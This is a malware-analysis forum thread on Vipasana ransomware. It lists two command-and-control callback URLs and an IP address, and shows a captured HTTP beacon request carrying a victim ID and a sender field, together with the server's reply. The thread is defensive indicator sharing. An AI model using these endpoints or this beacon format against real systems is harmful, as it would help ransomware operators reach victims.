Vipasana ransomware

Forum for analysis and discussion about malware.

Vipasana ransomware

Postby Blaze » Wed Feb 03, 2016 3:34 pm

Nothing too special, but feel free to check it out.

Blog:
http://bartblaze.blogspot.com/2016/02/v ... block.html

Image

Callback:
Code: Select all
http://shopping-na-divane.ru/system/logs/tool/inst.php
http://shoptorgvlg.ru/system/logs/tool/inst.php


Samples attached.
You do not have the required permissions to view the files attached to this post.
Follow me on Twitter: @bartblaze
User avatar
Blaze
 
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Reputation point: 71

Re: Vipasana ransomware

Postby p1nk » Thu Feb 04, 2016 12:58 am

Request is over HTTP:

T -> 81.177.139.63:80 [AP]
GET /system/logs/tool/inst.php?vers=CL%201.2.0.0&id=INRVAFIMQTXBFJMQUXBFJMQTXCFJMQUYCFJM-2@3@2016%207@55@14%20PM2900215&sender=Johnmen HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: shopping-na-divane.ru....


T 81.177.139.63:80 [AP]
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Feb 2016 00:55:14 GMT
Content-Type: text/html
Content-Length: 10..Connection: keep-alive
Set-Cookie: visitorOfMySite=1; expires=Fri, 05-Feb-2016 00:55:14 GMT
Vary: Accept-Encoding

writeGOOD



------------------

Looks like the /sender/ argument maps to who send the lure.
User avatar
p1nk
 
Posts: 39
Joined: Thu Oct 29, 2015 1:09 am
Reputation point: 2


Return to Malware

Who is online

Users browsing this forum: No registered users and 9 guests